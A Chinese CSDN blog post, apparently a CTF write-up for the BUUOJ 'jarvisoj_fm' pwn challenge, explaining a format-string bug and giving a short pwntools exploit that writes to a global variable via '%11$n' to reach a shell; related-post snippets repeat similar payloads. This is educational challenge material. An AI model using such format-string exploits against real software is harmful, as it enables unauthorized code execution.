[BUUOJ]jarvisoj_fm

最新推荐文章于 2024-08-06 17:28:11 发布
最新推荐文章于 2024-08-06 17:28:11 发布
阅读量214 收藏
点赞数
分类专栏: # BUUOJ 文章标签: 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Do1phln/article/details/127739092
版权

jarvisoj_fm

checksec为常规保护,进入IDA分析main逻辑内部判断本题应该是格式化字符串漏洞,因此进行gdb调试,下断点在漏洞printf0x080485AD处,输入一串字符串后在gdb内x/16wx $esp查找具体存储位置,发现是在第11位开始存储,所以据此构造exp

from pwn import *
from LibcSearcher import *

#context.log_level="debug"

#context(os='linux',arch='i386', log_level = 'debug')

#p=process('./fm')
elf=ELF('./fm')
p=remote('node4.buuoj.cn', 27028)


x_addr=0x0804A02C

payload = p32(x_addr) + b'%11$n'
p.sendline(payload)
p.interactive()
Do1phln
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF:jarvisoj_fm(write up)
qq_44768749的博客
08-24 320
BUUCTF:jarvisoj_fm0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01 文件分析 开启了栈不可执行、canary以及部分RELRO保护 0x02 运行 运行未发现什么异常,但感觉应该会是格式化字符串漏洞 0x03 IDA 程序比较简单,关键部分都在主函数中,有getshell的函数,当x=4才执行system("/bin/sh") 存在格式化字符串漏洞 0x04 思路 x的值默认为3,需要利用格式化字符串漏洞改写x的值 测试格式
BUUCTF---jarvisoj_level4
qq_33010875的博客
09-26 241
环境:WSL2,ubuntu16.04,python2 checksec文件: 将文件拖入ida 溢出点: 和level3不同的是 read函数之前没有调用write函数,因此要泄露libc的基地址需要用read函数,利用write函数将read函数在got表中的地址泄露出来 payload = (0x88+0x04)*'a'+p32(write_plt)+p32(main_addr)+p(1)+p32(read_got)+p(4) 接受泄露出来的地址 read_addr = u32(io.recv(
BUUCTF pwn——jarvisoj_fm
CNS-Enterprise BCC-1701-J
04-13 224
BUUCTF 做题练习
jarvisoj_fm
小白垃圾笔记2
05-20 749
fmtstr_payload(offset,writes,numbwritten=0,write_size='byte')
jarvisoj_fmBUUCTF】
qq_41696518的博客
08-31 297
jarvisoj_fmBUUCTF】
BUU刷题-Pwn-jarvisoj_fm
一个啥也不会的小菜鸡!
07-11 216
参数位置:从esp的下一个地址为第一个参数。格式化字符串漏洞,改变函数的值。%idx$n:修改某位置的内存。%numc:表示字符串长度。
JarvisOJ fm
PLpa的博客
07-09 1063
这一题是一道格式化字符串漏洞题 关于格式化漏洞的基础,你可以看我前面的博客,里面有提到:https://blog.csdn.net/qq_43986365/article/details/94896862 拿到这一题,我们仍然是先查看保护: 我们可以看到,简单的格式化漏洞题只开了NX和CANARY保护,好的。 接下来我们就可以进入IDA中看一下程序的具体逻辑: 在这里,我们可以看到有一个明显的...
FM.zip_FM_FM matlab
09-23
标题中的"FM.zip_FM_FM matlab"表明这是一个与调频(FM)技术相关的MATLAB项目压缩包。MATLAB是一种广泛用于数值计算、符号计算、数据可视化和建模的高级编程环境,尤其在信号处理和通信领域中应用广泛。在这个项目...
STM32F103_FM17550.rar
11-12
FM17550是一款通用串行接口芯片,常用于实现串行通信,如RS-485或RS-422,以满足长距离、多节点的通信需求。 在这个项目中,STM32F103与FM17550结合使用,实现了对RF A卡和B卡的读写操作。RF卡(Radio Frequency ...
FM.rar_FM_fm matlab_modulation
09-21
标题中的"FM.rar_FM_fm matlab_modulation"表明这是一个与调频(FM)技术相关的MATLAB代码压缩包。MATLAB是一种强大的编程环境,常用于数值计算、数据分析以及信号处理等领域,包括模拟和分析调频系统。 描述中的...
FM-test.rar_FM_fm test
09-23
标题中的"FM-test.rar_FM_fm test"提示我们这是一个与FM广播相关的项目,可能是一个软件或固件开发的压缩包。描述中提到的"TEA5767收音机程序"进一步确认了这一点,因为TEA5767是一款常用的数字调谐FM接收器集成电路...
FM.rar_FM_FM modulation_modulation
07-15
标题中的"FM.rar_FM_FM modulation_modulation"暗示了我们讨论的主题是关于调频(Frequency Modulation,简称FM)技术,特别是在MATLAB环境下的模拟。MATLAB是一个强大的数学计算软件,常用于信号处理、通信系统建模...
[BUUCTF]PWN——jarvisoj_fm
BangSen1的博客
03-19 325
jarvisoj_fm 例行检查,开启NX和CANARY保护,32位。 运行程序 IDA载入,检索字符串,看见了“/bin/sh”字符串 跟进函数,当x=4的时候执行system(/bin/sh) 存在格式化字符串漏洞,我们可以利用它随意读写的特性让x=4 找一下输入点的参数在栈上存储的位置,手动输入计算得到偏移为11 payload=p32(x_addr)+"%11$n" 首先传入x参数的地址,这个地址存放在栈上偏移为11的位置,利用%11$n,定位到了偏移为11的位置,往这个位置写入数据,写
【CTF】jarvisoj_fm 1
凉水的博客
07-06 531
jarvisoj_fm
jarvisoj_fm1解题
2301_81504456的博客
07-10 125
BUUCTF解题
BUUCTF ciscn_2019_ne_5 & jarvisoj_fm
红叶的博客
11-01 708
只开起了部分RELRO与NX。IDA中发现4个函数mainGetFlagAddLog主要只需要看这3个函数。
7个结构型设计模式
最新发布
m0_50546235的博客
08-06 898
适配器模式,桥接模式,组合模式,装饰模式,外观模式,享元模式,代理模式
复旦微电子FM1702SL_FM1702QFN NFC读卡机芯片手册
"FM1702SL_FM1702QFN通用读卡机芯片产品说明书详细介绍了复旦微电子推出的FM1702QFN封装的读卡机芯片,该芯片适用于小体积需求的NFC应用,如手机、U盘NFC读卡器和网上支付等场景,可以替代MFRC522芯片。这份官方文档...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值